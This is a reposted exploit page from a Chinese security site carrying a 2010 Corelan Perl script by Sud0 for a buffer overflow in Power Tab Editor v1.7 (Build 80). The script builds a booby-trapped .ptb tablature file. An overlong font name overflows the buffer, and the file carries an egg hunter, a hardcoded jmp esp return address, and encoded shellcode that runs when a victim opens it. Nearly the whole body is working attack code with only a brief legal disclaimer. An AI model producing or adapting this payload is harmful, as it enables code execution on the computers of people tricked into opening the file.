首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Power Tab Editor v1.7 (Build 80) Buffer Overflow
来源:http://www.corelan.be:8800 作者:Sud0 发布时间:2010-06-12  

#***********************************************************************************
# Exploit Title : Power Tab Editor v1.7 (Build 80)
# Date          : 07/06/2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.power-tab.net/guitar.php
# Version       : v1.7 (Build 80)
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : EIP / SEH
# Thanks to my wife for her support
# Congratz to markot for his new baby Manuel
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for Power Tab Editor v1.7 b80\n";

my $filename="poc.ptb";
my $junk = "\x20" x 463;
my  $footer =     "\x08\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F".
    "\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x08".
    "\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x54".
    "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x08\x00".
    "\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00";

my $egg=     "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

my  $buffer  = "ptab" . "\x04\x00\x00\x00\xFF\xCF\x01";    # File Header
 
 $buffer .= $junk ;
 $buffer .=    "\x00\x00\x02\x00\xDA\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x00\x01\x00\xFF\xFF\x01\x00\x07\x00\x43\x47\x75\x69\x74\x61\x72" ; # basic config for ptb file
 $buffer .=    "\x00\x08\x55\x6E\x74\x69\x74\x6C\x65\x64\x18\x68\x40\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x00\x00\x08\x53\x74\x61\x6E\x64\x61\x72\x64\x01\x06\x40\x3B\x37" ; # basic config for ptb file
 $buffer .=    "\x32\x2D\x28\x00\x00\x00\x00\x01\x00\xFF\xFF\x01\x00\x09\x00\x43" ; # basic config for ptb file
 $buffer .=    "\x47\x75\x69\x74\x61\x72\x49\x6E\x00\x00\x00\x00\x00\x01\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x00\x00\x00\x00\x01\x00\xFF\xFF\x01\x00\x08\x00\x43\x53\x65\x63" ; # basic config for ptb file
 $buffer .=    "\x74\x69\x6F\x6E\x32\x00\x00\x00\x14\x00\x00\x00\x20\x03\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x8F\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x10\x00\x80\x11\x1A" ; # basic config for ptb file
 $buffer .=    "\x04\x7F\x00\x00\x00\x00\x00\x00\x00\x01\x00\xFF\xFF\x01\x00\x06" ; # basic config for ptb file
 $buffer .=    "\x00\x43\x53\x74\x61\x66\x66\x06\x09\x09\x11\x00\x00\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x00\x00\x01\x00\x01\x80\x00\x08\x55\x6E\x74\x69\x74\x6C\x65\x64" ; # basic config for ptb file
 $buffer .=    "\x21\x68\x40\x00\x00\x00\x00\x00\x04\x42\x61\x73\x73\x01\x04\x2B" ; # basic config for ptb file
 $buffer .=    "\x26\x21\x1C\x00\x00\x00\x00\x01\x00\x03\x80\x00\x00\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x01\x00\x00\x00\x00\x00\x00\x01\x00\x05\x80\x32\x00\x00\x00\x14" ; # basic config for ptb file
 $buffer .=    "\x00\x00\x00\x20\x03\x00\x00\x7D\x00\x00\x00\x00\x14\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x00\x00\x10\x00\x80\x11\x1A\x04\x7F\x00\x00\x00\x00\x00\x00\x00" ; # basic config for ptb file
 $buffer .=    "\x01\x00\x07\x80\x14\x09\x09\x11\x00\x00\x00\x00\x00\x00\x00\x05" ; # basic config for ptb file

 $buffer .= "Arial" . "A" x 18;   # Font here where the Buffer Overflow occures
 $buffer .= $egg;
 $buffer .= "A" x 18;   # some junk
 $buffer .= "\xDC\x3A\xB4\x76";  # jmp esp from winmm.dll may be changed
 $buffer .= "\x90" x 4;   # somz NOPs
 $buffer .= "\xEB\xC4" ;   # Jump Backward to egg bunter
 $buffer .= "\xcc\x00\x36\x00";  # ptb file separator
 $buffer .= "A" x 918;   # some junk
 $buffer .= $footer;   # ptb file footer
$shellcode = "w00tw00t" .  "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIhYjKMKn92Ta4kDDqXRX2qjp1KyPdLKqadpnkaf4LNkrVELLKsvUXnkcNgPnk6VvXroWhrUJSv931N1kOiqSPLKRLtd5tNkcuWLlKPTWupxvakZNkpJWhnkSjgP5QJKxcVW1YNkVTLKEQxnfQ9oP1kpylnLK4kpT4WzYQZoVm5Qjg9yZQKOyoKOEkqlVDQ81eknLK1JUtS1zKSVlKvlpKNkRzwlwqJKnk7tLKc1KXoyStQ4eLE1iSOBwxeyKdOyhelIKrQxlNRntNzLPRixMLiokOkONiRewtmkcNkhkRQcLGeL6D0RM8NkyokOKOniSu38qxPl2LUpkO58Ucp2fNqt3XSEt32ESBOxQLWTtJOyJFv6KOSeFdLIYRRpoKnHMr2mmlmWWlutpRkX3nKOkOkOqxPLQQBnPXu8csRoV2W5VQyKNh1LTdUWoyHcPh2USUBLbxsXUp0MU1pnsX3RrO2U2T2HROT45ppa3XPmsQSBu3QxUprTrOUp1x2RcQRT2ZqxU3bORNQwu8qcwPFZUpphGPpsQq493XRs2UQtvPEayYoxpLutVKMYHaFQKbqB63PQ629oJp6QIPBpYoruWxWzA";

 $buffer .=$shellcode;

print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");

print FILE $buffer;
close(FILE);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·nginx 0.8.36 Source Disclosure
·Nginx <= 0.7.65 / 0.8.39 (dev)
·Adobe InDesign CS3 INDD File H
·Allwin MessageBoxA Shellcode
·Safari 5.0 Remote Buffer OverF
·Sygate Personal Firewall 5.6 b
·Microsoft Windows Help Centre
·DaLogin 2.2 (FCKeditor) Remote
·ActivePerl v5.8.8.817 Buffer O
·Solarwinds 10.4.0.13 DOS
·AWCM CMS Local File Inclusion
·Media Player Classic V1.3.1774
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved